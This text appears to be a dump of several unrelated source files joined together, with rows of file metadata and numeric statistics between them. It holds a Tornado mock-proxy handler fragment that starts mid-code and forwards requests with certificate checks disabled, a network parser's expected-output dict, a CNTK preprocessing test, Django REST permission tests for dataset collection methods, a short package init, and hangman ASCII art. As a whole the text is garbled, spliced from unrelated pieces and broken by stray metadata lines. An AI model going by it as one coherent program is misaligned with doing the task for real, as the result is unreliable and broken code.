response = getResponseById(responseID)
self.set_status(response.get("statusCode"))
self.set_header("Content-Type", response.get("type"))
if headers:
for hd in headers:
self.add_header(hd.get("name"), hd.get("value"))
self.write(response.get("response"))
self.finish()
else:
try:
serverIP, serverPort = getServerHost(serviceName)
except Exception, e:
self.set_status(500, "Internal Server Error!")
logger.error(e.message, 'line %d (/apps/api/handlers.py)' % (sys._getframe().f_lineno - 2))
self.finish()
else:
serverhost = "%s://%s:%s" % (protocol, serverIP, serverPort)
AsyncHTTPClient().fetch(
HTTPRequest(
url=serverhost + uri,
method=method,
headers=headers_o,
body=body_o,
validate_cert=False
),
self.on_response)
@tornado.web.asynchronous
def get(self):
try:
req = self.request
protocol = req.protocol
host = req.host
method = req.method
uri = req.uri
urigroups = uri.split('/')
if urigroups[1]=="errorpage":
path =self.get_argument("path")
sc = urigroups[2]
if sc == "404":
reason = "<h1>Not Found</h1><p>The requested URL %s was not found on this server.</p>"%path
else:
reason = "<h1>Internal Server Error</h1>"
self.set_status(int(sc))
self.write(reason)
self.finish()
return
except Exception,e:
self.set_status(500, "Internal Server Error!")
logger.error(e.message, 'line %d (/apps/api/handlers.py)' % (sys._getframe().f_lineno - 2))
self.finish()
return
try:
headers_o = req.headers
body_o = req.body
remote_ip = req.remote_ip
path = req.path
request_headers = req.headers
request_query = req.arguments
request_body = req.body
serviceName = request_headers.get("downstream-service-id", None)
except Exception,e:
self.set_status(500, "Internal Server Error!")
logger.error(e.message, 'line %d (/apps/api/handlers.py)' % (sys._getframe().f_lineno - 2))
self.finish()
return
if not serviceName:
self.set_status(500, "The request header resolution failed!")
logger.error("请求头解析失败!", 'line %d (/apps/api/handlers.py)' % (sys._getframe().f_lineno - 2))
self.finish()
return
if not request_body:
request_body = {}
else:
try:
request_body = json.loads(request_body)
except:
request_body = {}
t = {}
for i in request_query:
t.setdefault(i, request_query[i][-1])
request_query = t
responseID, headers = checkMockMatch(serviceName, uri, request_headers, request_query,
request_body)
if responseID:
response = getResponseById(responseID)
self.set_status(response.get("statusCode"))
self.set_header("Content-Type", response.get("type"))
if headers:
for hd in headers:
self.add_header(hd.get("name"), hd.get("value"))
self.write(response.get("response"))
self.finish()
else:
try:
serverIP, serverPort = getServerHost(serviceName)
except Exception, e:
self.set_status(500, "Internal Server Error!")
logger.error(e.message, 'line %d (/apps/api/handlers.py)' % (sys._getframe().f_lineno - 2))
self.finish()
else:
serverhost = "%s://%s:%s" % (protocol, serverIP, serverPort)
AsyncHTTPClient().fetch(
HTTPRequest(
url=serverhost + uri,
method=method,
headers=headers_o,
body=body_o,
validate_cert=False
),
self.on_response)
if __name__ == '__main__':
skip = False
ret = ""
| 37.596244
| 111
| 0.526224
| 821
| 8,008
| 5.008526
| 0.183922
| 0.027237
| 0.041099
| 0.031128
| 0.794261
| 0.794261
| 0.794261
| 0.794261
| 0.794261
| 0.794261
| 0
| 0.012094
| 0.37013
| 8,008
| 212
| 112
| 37.773585
| 0.803132
| 0.001499
| 0
| 0.840796
| 0
| 0.00995
| 0.109846
| 0.028275
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.054726
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9dec91a91b61357a1df3e055ec48ae8f62513ca1
| 6,806
|
py
|
Python
|
src/genie/libs/parser/iosxr/tests/ShowL2vpnForwardingBridgeDomainMacAddress/cli/equal/golden_output_1_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 204
|
2018-06-27T00:55:27.000Z
|
2022-03-06T21:12:18.000Z
|
src/genie/libs/parser/iosxr/tests/ShowL2vpnForwardingBridgeDomainMacAddress/cli/equal/golden_output_1_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 468
|
2018-06-19T00:33:18.000Z
|
2022-03-31T23:23:35.000Z
|
src/genie/libs/parser/iosxr/tests/ShowL2vpnForwardingBridgeDomainMacAddress/cli/equal/golden_output_1_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 309
|
2019-01-16T20:21:07.000Z
|
2022-03-30T12:56:41.000Z
|
expected_output = {
'mac_table': {
'Te0/0/1/0/3.3': {
'mac_address': {
'0001.00ff.0002': {
'lc_learned': 'N/A',
'learned_from': 'Te0/0/1/0/3.3',
'mapped_to': 'N/A',
'resync_age': '0d '
'0h '
'0m '
'14s',
'type': 'dynamic'},
'0001.00ff.0003': {
'lc_learned': 'N/A',
'learned_from': 'Te0/0/1/0/3.3',
'mapped_to': 'N/A',
'resync_age': '0d '
'0h '
'0m '
'14s',
'type': 'dynamic'},
'0001.00ff.0004': {
'lc_learned': 'N/A',
'learned_from': 'Te0/0/1/0/3.3',
'mapped_to': 'N/A',
'resync_age': '0d '
'0h '
'0m '
'14s',
'type': 'dynamic'},
'0001.00ff.0005': {
'lc_learned': 'N/A',
'learned_from': 'Te0/0/1/0/3.3',
'mapped_to': 'N/A',
'resync_age': '0d '
'0h '
'0m '
'14s',
'type': 'dynamic'},
'0001.00ff.0006': {
'lc_learned': 'N/A',
'learned_from': 'Te0/0/1/0/3.3',
'mapped_to': 'N/A',
'resync_age': '0d '
'0h '
'0m '
'14s',
'type': 'dynamic'},
'0001.00ff.0007': {
'lc_learned': 'N/A',
'learned_from': 'Te0/0/1/0/3.3',
'mapped_to': 'N/A',
'resync_age': '0d '
'0h '
'0m '
'14s',
'type': 'dynamic'},
'0001.00ff.0008': {
'lc_learned': 'N/A',
'learned_from': 'Te0/0/1/0/3.3',
'mapped_to': 'N/A',
'resync_age': '0d '
'0h '
'0m '
'14s',
'type': 'dynamic'},
'0001.00ff.0009': {
'lc_learned': 'N/A',
'learned_from': 'Te0/0/1/0/3.3',
'mapped_to': 'N/A',
'resync_age': '0d '
'0h '
'0m '
'14s',
'type': 'dynamic'},
'0001.00ff.000a': {
'lc_learned': 'N/A',
'learned_from': 'Te0/0/1/0/3.3',
'mapped_to': 'N/A',
'resync_age': '0d '
'0h '
'0m '
'14s',
'type': 'dynamic'},
'0001.00ff.000b': {
'lc_learned': 'N/A',
'learned_from': 'Te0/0/1/0/3.3',
'mapped_to': 'N/A',
'resync_age': '0d '
'0h '
'0m '
'14s',
'type': 'dynamic'},
'0001.00ff.000c': {
'lc_learned': 'N/A',
'learned_from': 'Te0/0/1/0/3.3',
'mapped_to': 'N/A',
'resync_age': '0d '
'0h '
'0m '
'14s',
'type': 'dynamic'},
'0001.00ff.000d': {
'lc_learned': 'N/A',
'learned_from': 'Te0/0/1/0/3.3',
'mapped_to': 'N/A',
'resync_age': '0d '
'0h '
'0m '
'14s',
'type': 'dynamic'},
'0001.00ff.000e': {
'lc_learned': 'N/A',
'learned_from': 'Te0/0/1/0/3.3',
'mapped_to': 'N/A',
'resync_age': '0d '
'0h '
'0m '
'14s',
'type': 'dynamic'},
'0001.00ff.000f': {
'lc_learned': 'N/A',
'learned_from': 'Te0/0/1/0/3.3',
'mapped_to': 'N/A',
'resync_age': '0d '
'0h '
'0m '
'14s',
'type': 'dynamic'},
'0001.00ff.0010': {
'lc_learned': 'N/A',
'learned_from': 'Te0/0/1/0/3.3',
'mapped_to': 'N/A',
'resync_age': '0d '
'0h '
'0m '
'14s',
'type': 'dynamic'},
'0001.00ff.0011': {
'lc_learned': 'N/A',
'learned_from': 'Te0/0/1/0/3.3',
'mapped_to': 'N/A',
'resync_age': '0d '
'0h '
'0m '
'14s',
'type': 'dynamic'},
'0001.00ff.0012': {
'lc_learned': 'N/A',
'learned_from': 'Te0/0/1/0/3.3',
'mapped_to': 'N/A',
'resync_age': '0d '
'0h '
'0m '
'14s',
'type': 'dynamic'},
'0001.00ff.0013': {
'lc_learned': 'N/A',
'learned_from': 'Te0/0/1/0/3.3',
'mapped_to': 'N/A',
'resync_age': '0d '
'0h '
'0m '
'14s',
'type': 'dynamic'}
}
}
}
}
| 39.34104
| 52
| 0.23112
| 498
| 6,806
| 3.008032
| 0.088353
| 0.048064
| 0.063418
| 0.076101
| 0.925234
| 0.925234
| 0.919893
| 0.919893
| 0.919893
| 0.919893
| 0
| 0.151503
| 0.633412
| 6,806
| 172
| 53
| 39.569767
| 0.448898
| 0
| 0
| 0.841176
| 0
| 0
| 0.261464
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d1ade1d80503631be0f40c5c062da5365c98fc74
| 3,582
|
py
|
Python
|
bindings/python/cntk/contrib/deeprl/tests/preprocessing_test.py
|
burhandodhy/CNTK
|
fcdeef63d0192c7b4b7428b14c1f9750d6c1de2e
|
[
"MIT"
] | 17,702
|
2016-01-25T14:03:01.000Z
|
2019-05-06T09:23:41.000Z
|
bindings/python/cntk/contrib/deeprl/tests/preprocessing_test.py
|
burhandodhy/CNTK
|
fcdeef63d0192c7b4b7428b14c1f9750d6c1de2e
|
[
"MIT"
] | 3,489
|
2016-01-25T13:32:09.000Z
|
2019-05-03T11:29:15.000Z
|
bindings/python/cntk/contrib/deeprl/tests/preprocessing_test.py
|
burhandodhy/CNTK
|
fcdeef63d0192c7b4b7428b14c1f9750d6c1de2e
|
[
"MIT"
] | 5,180
|
2016-01-25T14:02:12.000Z
|
2019-05-06T04:24:28.000Z
|
# Copyright (c) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE.md file in the project root
# for full license information.
# ==============================================================================
import unittest
import numpy as np
from cntk.contrib.deeprl.agent.shared.preprocessing import AtariPreprocessing
class AtariPreprocessingTest(unittest.TestCase):
"""Unit tests for AtariPreprocessing."""
def test_atari_preprocessing(self):
p = AtariPreprocessing((210, 160, 3), 4)
self.assertEqual(p._AtariPreprocessing__history_len, 4)
np.testing.assert_array_equal(
p._AtariPreprocessing__previous_raw_image,
np.zeros((210, 160, 3), dtype='uint8'))
self.assertEqual(len(p._AtariPreprocessing__processed_image_seq), 4)
np.testing.assert_array_equal(
p._AtariPreprocessing__processed_image_seq[0],
np.zeros((84, 84), dtype='uint8'))
np.testing.assert_array_equal(
p._AtariPreprocessing__processed_image_seq[-1],
np.zeros((84, 84), dtype='uint8'))
r = p.preprocess(np.ones((210, 160, 3), dtype=np.uint8))
np.testing.assert_array_equal(
p._AtariPreprocessing__previous_raw_image,
np.ones((210, 160, 3), dtype=np.uint8))
self.assertEqual(len(p._AtariPreprocessing__processed_image_seq), 4)
np.testing.assert_array_equal(
p._AtariPreprocessing__processed_image_seq[0],
np.zeros((84, 84), dtype='uint8'))
np.testing.assert_array_equal(
p._AtariPreprocessing__processed_image_seq[-1],
np.ones((84, 84), dtype='uint8'))
self.assertEqual(r.shape, (4, 84, 84))
np.testing.assert_array_equal(
np.squeeze(r[3, :, :]),
np.ones((84, 84), dtype='uint8'))
p.preprocess(np.ones((210, 160, 3), dtype=np.uint8) * 2)
p.preprocess(np.ones((210, 160, 3), dtype=np.uint8) * 3)
r = p.preprocess(np.ones((210, 160, 3), dtype=np.uint8) * 4)
np.testing.assert_array_equal(
p._AtariPreprocessing__previous_raw_image,
np.ones((210, 160, 3), dtype='uint8') * 4)
self.assertEqual(len(p._AtariPreprocessing__processed_image_seq), 4)
np.testing.assert_array_equal(
p._AtariPreprocessing__processed_image_seq[0],
np.ones((84, 84), dtype='uint8'))
np.testing.assert_array_equal(
p._AtariPreprocessing__processed_image_seq[1],
np.ones((84, 84), dtype='uint8') * 2)
np.testing.assert_array_equal(
p._AtariPreprocessing__processed_image_seq[2],
np.ones((84, 84), dtype='uint8') * 3)
np.testing.assert_array_equal(
p._AtariPreprocessing__processed_image_seq[3],
np.ones((84, 84), dtype='uint8') * 4)
self.assertEqual(r.shape, (4, 84, 84))
np.testing.assert_array_equal(
np.squeeze(r[3, :, :]),
np.ones((84, 84), dtype='uint8') * 4)
p.reset()
np.testing.assert_array_equal(
p._AtariPreprocessing__previous_raw_image,
np.zeros((210, 160, 3), dtype='uint8'))
self.assertEqual(len(p._AtariPreprocessing__processed_image_seq), 4)
np.testing.assert_array_equal(
p._AtariPreprocessing__processed_image_seq[0],
np.zeros((84, 84), dtype='uint8'))
np.testing.assert_array_equal(
p._AtariPreprocessing__processed_image_seq[-1],
np.zeros((84, 84), dtype='uint8'))
| 43.682927
| 80
| 0.620882
| 435
| 3,582
| 4.818391
| 0.165517
| 0.181298
| 0.114504
| 0.152672
| 0.808683
| 0.805821
| 0.79437
| 0.79437
| 0.782443
| 0.782443
| 0
| 0.060639
| 0.231156
| 3,582
| 81
| 81
| 44.222222
| 0.700436
| 0.073144
| 0
| 0.712121
| 0
| 0
| 0.022652
| 0
| 0
| 0
| 0
| 0
| 0.348485
| 1
| 0.015152
| false
| 0
| 0.045455
| 0
| 0.075758
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d1c8adaf9b47f8416ea31e6819d2f57e10149a7c
| 154
|
py
|
Python
|
src/api/controller/__init__.py
|
samborba/mediapipe-api
|
217584e052545a421c35bc2ab9e336b099442573
|
[
"Apache-2.0"
] | 12
|
2020-02-14T20:03:43.000Z
|
2022-01-10T02:07:24.000Z
|
src/api/controller/__init__.py
|
samborba/mediapipe-api
|
217584e052545a421c35bc2ab9e336b099442573
|
[
"Apache-2.0"
] | 2
|
2020-04-17T13:41:30.000Z
|
2020-12-16T01:17:26.000Z
|
src/api/controller/__init__.py
|
samborba/mediapipe-api
|
217584e052545a421c35bc2ab9e336b099442573
|
[
"Apache-2.0"
] | 3
|
2020-02-13T17:45:36.000Z
|
2021-05-26T23:55:33.000Z
|
from . import default_page
from . import hand_tracking
from . import multi_hand_tracking
from . import object_detection
from . import gesture_recognition
| 25.666667
| 33
| 0.837662
| 21
| 154
| 5.857143
| 0.52381
| 0.406504
| 0.260163
| 0.357724
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12987
| 154
| 5
| 34
| 30.8
| 0.91791
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
0617cc4fd8c24ef85695bc483c62d91b49779f31
| 14,941
|
py
|
Python
|
api/radiam/api/tests/permissionstests/datasetdatacollectionmethodpermissionstests.py
|
usask-rc/radiam
|
bfa38fd33e211b66e30e453a717c5f216e848cb2
|
[
"MIT"
] | 2
|
2020-02-01T20:41:28.000Z
|
2020-02-03T20:57:59.000Z
|
api/radiam/api/tests/permissionstests/datasetdatacollectionmethodpermissionstests.py
|
usask-rc/radiam
|
bfa38fd33e211b66e30e453a717c5f216e848cb2
|
[
"MIT"
] | 10
|
2020-04-20T15:52:49.000Z
|
2020-04-30T18:03:09.000Z
|
api/radiam/api/tests/permissionstests/datasetdatacollectionmethodpermissionstests.py
|
usask-rc/radiam
|
bfa38fd33e211b66e30e453a717c5f216e848cb2
|
[
"MIT"
] | null | null | null |
import json
from rest_framework.test import APITestCase
from rest_framework.test import APIRequestFactory
from rest_framework.test import force_authenticate
from django.urls import reverse
from radiam.api.models import (
User, Dataset, DataCollectionMethod, DatasetDataCollectionMethod
)
from radiam.api.views import DatasetDataCollectionMethodViewSet
class TestSuperuserDatasetDataCollectionMethodPermissions(APITestCase):
"""
Test Response codes for DataCollectionMethod endpoints for Superuser roles
"""
fixtures = ['userpermissions']
def setUp(self):
self.factory = APIRequestFactory()
self.user = User.objects.get(username='admin')
def test_superuser_read_datasetdatacollectionmethod_list(self):
"""
Test Superuser can read DatasetDataCollectionMethod list
"""
request = self.factory.get(reverse('datasetdatacollectionmethod-list'))
request.user = self.user
force_authenticate(request, user=request.user)
response = DatasetDataCollectionMethodViewSet.as_view({'get': 'list'})(request)
self.assertContains(
response=response,
text="",
status_code=200)
def test_superuser_write_datasetdatacollectionmethod_list(self):
"""
Test Superuser can write DatasetDataCollectionMethod list
"""
datacollectionmethod = DataCollectionMethod.objects.get(label='datacollection.method.other')
dataset = Dataset.objects.get(title='Research Is Fun')
body = {
'dataset': str(dataset.id),
'data_collection_method': str(datacollectionmethod.id)
}
request = self.factory.post(
reverse('datasetdatacollectionmethod-list'),
json.dumps(body),
content_type='application/json'
)
request.user = self.user
force_authenticate(request, user=request.user)
response = DatasetDataCollectionMethodViewSet.as_view({'post': 'create'})(request)
self.assertContains(response=response, text="", status_code=201)
def test_superuser_read_datasetdatacollectionmethod_detail(self):
"""
Test Superuser can read a DatasetDataCollectionMethod detail
"""
detail_datasetdatacollectionmethod = \
DatasetDataCollectionMethod.objects.get(id='f9d1402a-2301-4bf8-b4cd-70590e3ca4b7')
request = self.factory.get(
reverse('datasetdatacollectionmethod-detail',
args=[detail_datasetdatacollectionmethod.id]))
request.user = self.user
force_authenticate(request, user=request.user)
response = DatasetDataCollectionMethodViewSet.as_view({'get': 'retrieve'})(request, pk=detail_datasetdatacollectionmethod.id)
self.assertContains(
response=response,
text="",
status_code=200)
def test_superuser_write_datasetdatacollectionmethod_detail(self):
"""
Test Superuser can write a DatasetDataCollectionMethod detail
"""
detail_datasetdatacollectionmethod = \
DatasetDataCollectionMethod.objects.get(id='f9d1402a-2301-4bf8-b4cd-70590e3ca4b7')
data_collection_method = DataCollectionMethod.objects.get(label='datacollection.method.other')
body = {
"data_collection_method": reverse('datacollectionmethod-detail', kwargs={'pk': data_collection_method.id})
}
request = self.factory.patch(
reverse('datasetdatacollectionmethod-detail',
args=[detail_datasetdatacollectionmethod.id]))
request.user = self.user
force_authenticate(request, user=request.user)
response = DatasetDataCollectionMethodViewSet.as_view({'patch': 'partial_update'})(request, pk=detail_datasetdatacollectionmethod.id)
self.assertContains(
response=response,
text="",
status_code=200)
class TestAdminUserDatasetDataCollectionMethodPermissions(APITestCase):
"""
Test Response codes for DataCollectionMethod endpoints for Admin User roles
"""
fixtures = ['userpermissions']
def setUp(self):
self.factory = APIRequestFactory()
self.user = User.objects.get(username='testuser1')
def test_admin_user_read_datasetdatacollectionmethod_list(self):
"""
Test Admin User can read DatasetDataCollectionMethod list
"""
request = self.factory.get(reverse('datasetdatacollectionmethod-list'))
request.user = self.user
force_authenticate(request, user=request.user)
response = DatasetDataCollectionMethodViewSet.as_view({'get': 'list'})(request)
self.assertContains(
response=response,
text="",
status_code=200)
def test_admin_user_write_datasetdatacollectionmethod_list(self):
"""
Test Member user cannot write DatasetDataCollectionMethod list
"""
datacollectionmethod = DataCollectionMethod.objects.get(label='datacollection.method.other')
dataset = Dataset.objects.get(title='Research Is Fun')
body = {
'dataset': str(dataset.id),
'data_collection_method': str(datacollectionmethod.id)
}
request = self.factory.post(
reverse('datasetdatacollectionmethod-list'),
json.dumps(body),
content_type='application/json'
)
request.user = self.user
force_authenticate(request, user=request.user)
response = DatasetDataCollectionMethodViewSet.as_view({'post': 'create'})(request)
self.assertContains(
response=response,
text="",
status_code=201)
def test_adminuser_read_datasetdatacollectionmethod_detail(self):
"""
Test Admin user can read a DatasetDataCollectionMethod detail
"""
detail_datasetdatacollectionmethod = \
DatasetDataCollectionMethod.objects.get(id='f9d1402a-2301-4bf8-b4cd-70590e3ca4b7')
request = self.factory.get(
reverse('datasetdatacollectionmethod-detail',
args=[detail_datasetdatacollectionmethod.id]))
request.user = self.user
force_authenticate(request, user=request.user)
response = DatasetDataCollectionMethodViewSet.as_view({'get': 'retrieve'})(request, pk=detail_datasetdatacollectionmethod.id)
self.assertContains(
response=response,
text="",
status_code=200)
def test_admin_user_write_datasetdatacollectionmethod_detail(self):
"""
Test Admin User can write a DatasetDataCollectionMethod detail
"""
detail_datasetdatacollectionmethod = \
DatasetDataCollectionMethod.objects.get(id='f9d1402a-2301-4bf8-b4cd-70590e3ca4b7')
data_collection_method = DataCollectionMethod.objects.get(label='datacollection.method.other')
body = {
"data_collection_method": reverse('datacollectionmethod-detail', kwargs={'pk': data_collection_method.id})
}
request = self.factory.patch(
reverse('datasetdatacollectionmethod-detail',
args=[detail_datasetdatacollectionmethod.id]))
request.user = self.user
force_authenticate(request, user=request.user)
response = DatasetDataCollectionMethodViewSet.as_view({'patch': 'partial_update'})(request, pk=detail_datasetdatacollectionmethod.id)
self.assertContains(
response=response,
text="",
status_code=200)
class TestManagerUserDatasetDataCollectionMethodPermissions(APITestCase):
"""
Test Response codes for DataCollectionMethod endpoints for Manager User roles
"""
fixtures = ['userpermissions']
def setUp(self):
self.factory = APIRequestFactory()
self.user = User.objects.get(username='testuser2')
def test_manager_user_read_datasetdatacollectionmethod_list(self):
"""
Test Manager User can read DatasetDataCollectionMethod list
"""
request = self.factory.get(reverse('datasetdatacollectionmethod-list'))
request.user = self.user
force_authenticate(request, user=request.user)
response = DatasetDataCollectionMethodViewSet.as_view({'get': 'list'})(request)
self.assertContains(
response=response,
text="",
status_code=200)
def test_manager_user_write_datasetdatacollectionmethod_list(self):
"""
Test Member user cannot write DatasetDataCollectionMethod list
"""
datacollectionmethod = DataCollectionMethod.objects.get(label='datacollection.method.other')
dataset = Dataset.objects.get(title='Research Is Fun')
body = {
'dataset': str(dataset.id),
'data_collection_method': reverse('datacollectionmethod-detail', kwargs={'pk': datacollectionmethod.id})
}
request = self.factory.post(
reverse('datasetdatacollectionmethod-list'),
json.dumps(body),
content_type='application/json'
)
request.user = self.user
force_authenticate(request, user=request.user)
response = DatasetDataCollectionMethodViewSet.as_view({'post': 'create'})(request)
self.assertContains(
response=response,
text="",
status_code=403)
def test_manager_user_read_datasetdatacollectionmethod_detail(self):
"""
Test Manager user can read a DatasetDataCollectionMethod detail
"""
detail_datasetdatacollectionmethod = \
DatasetDataCollectionMethod.objects.get(id='f9d1402a-2301-4bf8-b4cd-70590e3ca4b7')
request = self.factory.get(
reverse('datasetdatacollectionmethod-detail',
args=[detail_datasetdatacollectionmethod.id]))
request.user = self.user
force_authenticate(request, user=request.user)
response = DatasetDataCollectionMethodViewSet.as_view({'get': 'retrieve'})(request, pk=detail_datasetdatacollectionmethod.id)
self.assertContains(
response=response,
text="",
status_code=200)
def test_manager_user_write_datasetdatacollectionmethod_detail(self):
"""
Test Manager User can write a DatasetDataCollectionMethod detail
"""
detail_datasetdatacollectionmethod = \
DatasetDataCollectionMethod.objects.get(id='f9d1402a-2301-4bf8-b4cd-70590e3ca4b7')
data_collection_method = DataCollectionMethod.objects.get(label='datacollection.method.other')
body = {
"data_collection_method": str(data_collection_method.id)
}
request = self.factory.patch(
reverse('datasetdatacollectionmethod-detail',
args=[detail_datasetdatacollectionmethod.id]))
request.user = self.user
force_authenticate(request, user=request.user)
response = DatasetDataCollectionMethodViewSet.as_view({'patch': 'partial_update'})(request, pk=detail_datasetdatacollectionmethod.id)
self.assertContains(
response=response,
text="",
status_code=403)
class TestMemberUserDatasetDataCollectionMethodPermissions(APITestCase):
"""
Test Response codes for DataCollectionMethod endpoints for Member User roles
"""
fixtures = ['userpermissions']
def setUp(self):
self.factory = APIRequestFactory()
self.user = User.objects.get(username='testuser3')
def test_member_user_read_datasetdatacollectionmethod_list(self):
"""
Test Member User can read DatasetDataCollectionMethod list
"""
request = self.factory.get(reverse('datasetdatacollectionmethod-list'))
request.user = self.user
force_authenticate(request, user=request.user)
response = DatasetDataCollectionMethodViewSet.as_view({'get': 'list'})(request)
self.assertContains(
response=response,
text="",
status_code=200)
def test_member_user_write_datasetdatacollectionmethod_list(self):
"""
Test Member user cannot write DatasetDataCollectionMethod list
"""
datacollectionmethod = DataCollectionMethod.objects.get(label='datacollection.method.other')
dataset = Dataset.objects.get(title='Research Is Fun')
body = {
'dataset': str(dataset.id),
'data_collection_method': str(datacollectionmethod.id)
}
request = self.factory.post(
reverse('datasetdatacollectionmethod-list'),
json.dumps(body),
content_type='application/json'
)
request.user = self.user
force_authenticate(request, user=request.user)
response = DatasetDataCollectionMethodViewSet.as_view({'post': 'create'})(request)
self.assertContains(
response=response,
text="",
status_code=403)
def test_member_user_read_datasetdatacollectionmethod_detail(self):
"""
Test Member user can read a DatasetDataCollectionMethod detail
"""
detail_datasetdatacollectionmethod = \
DatasetDataCollectionMethod.objects.get(id='f9d1402a-2301-4bf8-b4cd-70590e3ca4b7')
request = self.factory.get(
reverse('datasetdatacollectionmethod-detail',
args=[detail_datasetdatacollectionmethod.id]))
request.user = self.user
force_authenticate(request, user=request.user)
response = DatasetDataCollectionMethodViewSet.as_view({'get': 'retrieve'})(request, pk=detail_datasetdatacollectionmethod.id)
self.assertContains(
response=response,
text="",
status_code=200)
def test_member_user_write_datasetdatacollectionmethod_detail(self):
"""
Test Member User can write a DatasetDataCollectionMethod detail
"""
detail_datasetdatacollectionmethod = \
DatasetDataCollectionMethod.objects.get(id='f9d1402a-2301-4bf8-b4cd-70590e3ca4b7')
data_collection_method = DataCollectionMethod.objects.get(label='datacollection.method.other')
body = {
"data_collection_method": str(data_collection_method.id)
}
request = self.factory.patch(
reverse('datasetdatacollectionmethod-detail',
args=[detail_datasetdatacollectionmethod.id]))
request.user = self.user
force_authenticate(request, user=request.user)
response = DatasetDataCollectionMethodViewSet.as_view({'patch': 'partial_update'})(request, pk=detail_datasetdatacollectionmethod.id)
self.assertContains(
response=response,
text="",
status_code=403)
| 36.089372
| 141
| 0.668496
| 1,283
| 14,941
| 7.636009
| 0.075604
| 0.053894
| 0.029397
| 0.03103
| 0.946923
| 0.934878
| 0.898132
| 0.877616
| 0.847708
| 0.847708
| 0
| 0.018563
| 0.239208
| 14,941
| 413
| 142
| 36.176755
| 0.843318
| 0.08634
| 0
| 0.813953
| 0
| 0
| 0.130616
| 0.097489
| 0
| 0
| 0
| 0
| 0.062016
| 1
| 0.077519
| false
| 0
| 0.027132
| 0
| 0.135659
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ae102d0b97806b39c67128b778f1e237fd39f6a8
| 79
|
py
|
Python
|
eno/__init__.py
|
endaga/eno-python
|
eb336fdcdf4b78c2c84c680e62ec74679396e7b3
|
[
"MIT"
] | 1
|
2018-08-17T07:30:19.000Z
|
2018-08-17T07:30:19.000Z
|
eno/__init__.py
|
endaga/eno-python
|
eb336fdcdf4b78c2c84c680e62ec74679396e7b3
|
[
"MIT"
] | null | null | null |
eno/__init__.py
|
endaga/eno-python
|
eb336fdcdf4b78c2c84c680e62ec74679396e7b3
|
[
"MIT"
] | null | null | null |
"""The eno core."""
from eno.nodes import get_node
from eno.nodes import Node
| 15.8
| 30
| 0.734177
| 14
| 79
| 4.071429
| 0.571429
| 0.245614
| 0.421053
| 0.631579
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.151899
| 79
| 4
| 31
| 19.75
| 0.850746
| 0.164557
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
ae7fc0c645ddb52e75edcd770288590401a23015
| 709
|
py
|
Python
|
hangman_life.py
|
MohammadHAbbaspour/Hang-Man-Game
|
314b4e8d1b75188deb6f066dc937e95029a1e388
|
[
"MIT"
] | null | null | null |
hangman_life.py
|
MohammadHAbbaspour/Hang-Man-Game
|
314b4e8d1b75188deb6f066dc937e95029a1e388
|
[
"MIT"
] | null | null | null |
hangman_life.py
|
MohammadHAbbaspour/Hang-Man-Game
|
314b4e8d1b75188deb6f066dc937e95029a1e388
|
[
"MIT"
] | null | null | null |
lives = ['''
________
| \|
O |
/|\ |
/ \ |
|
=========
''' , '''
________
| \|
O |
/|\ |
\ |
|
=========
''' , '''
________
| \|
O |
/|\ |
|
|
=========
''','''
________
| \|
O |
|\ |
|
|
=========
''','''
________
| \|
O |
| |
|
|
=========
''','''
________
| \|
O |
|
|
=========
''','''
________
| \|
|
|
|
|
=========
''']
| 12.660714
| 13
| 0.094499
| 7
| 709
| 1.571429
| 0.285714
| 0.909091
| 1.090909
| 1.090909
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.655853
| 709
| 56
| 14
| 12.660714
| 0.045082
| 0
| 0
| 0.660714
| 0
